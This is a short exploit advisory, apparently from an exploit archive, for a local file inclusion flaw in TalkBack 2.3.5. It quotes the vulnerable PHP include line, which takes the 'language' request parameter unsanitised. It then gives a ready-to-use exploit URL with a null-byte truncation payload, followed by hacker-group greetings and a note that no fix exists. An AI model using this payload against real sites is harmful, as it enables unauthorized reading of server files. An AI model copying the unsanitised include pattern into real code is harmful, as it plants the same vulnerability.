TalkBack 2.3.5 (language) Local File Inclusion Vulnerability

2008-07-28 00:00:00

=============================================================================================================

[o] TalkBack 2.3.5 Local File Inclusion Vulnerability

Software : TalkBack version 2.3.5
Vendor : http://www.scripts.oldguy.us/talkback
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com

=============================================================================================================

[o] Vulnerable file

install/help.php

include "../language/{$_REQUEST['language']}.php";



[o] Exploit

http://localhost/[path]/install/help.php?language=[LFI]%00


=============================================================================================================

[o] Greetz

supported by irc.nob0dy.net
skulmatic olibekas ulga Cungkee nyubi k1tk4t str0ke
H312Y yooogy mousekill }^-^{ martfella
okegay OoN_Gay pagay (sungguh penyembunyian sebuah karakter dibalik makna kata) /me brb ngakak.. :)

=============================================================================================================

#

Fixes

No fixes

In order to submit a new fix you need to be registered.